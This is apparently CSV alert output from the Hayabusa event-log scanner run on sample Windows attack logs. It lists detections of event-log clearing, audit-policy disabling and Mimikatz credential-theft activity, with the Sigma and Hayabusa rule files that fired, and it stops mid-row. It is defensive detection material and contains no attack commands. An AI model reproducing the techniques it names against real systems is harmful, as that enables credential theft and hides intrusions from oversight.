logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.309 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.325 
+09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.341 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.356 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.403 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.419 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.434 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event 
logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.450 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.481 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.481 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.497 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.528 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.747 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: 
admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.763 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.778 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.794 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.809 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.856 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.934 
+09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:10.997 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.028 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.091 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.106 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.184 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event 
logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.200 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.216 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.247 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.341 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.388 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.403 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: 
admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.450 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.559 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.575 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.622 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.700 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.747 
+09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.778 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.825 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.841 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.856 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.872 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event 
logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.888 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.903 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.997 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:12.059 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:12.075 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:12.106 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: 
admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:12.153 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:12.184 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:12.247 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:21:02.504 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Audit policy enumerated.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event 
Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 
+09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx 
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit 
policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit 
policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-27 19:09:16.280 +09:00,fs03vuln.offsec.lan,823,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" +2021-10-27 19:12:47.151 +09:00,fs03vuln.offsec.lan,4674,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,5142-Mimikatz print spool privileges requested.evtx" +2021-10-27 19:12:47.229 +09:00,fs03vuln.offsec.lan,5142,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,5142-Mimikatz print spool privileges requested.evtx" +2021-10-27 19:12:47.323 +09:00,fs03vuln.offsec.lan,823,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" +2021-10-27 19:14:21.369 +09:00,fs03vuln.offsec.lan,302,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" +2021-10-27 19:14:21.369 +09:00,fs03vuln.offsec.lan,849,critical,Mimikatz 
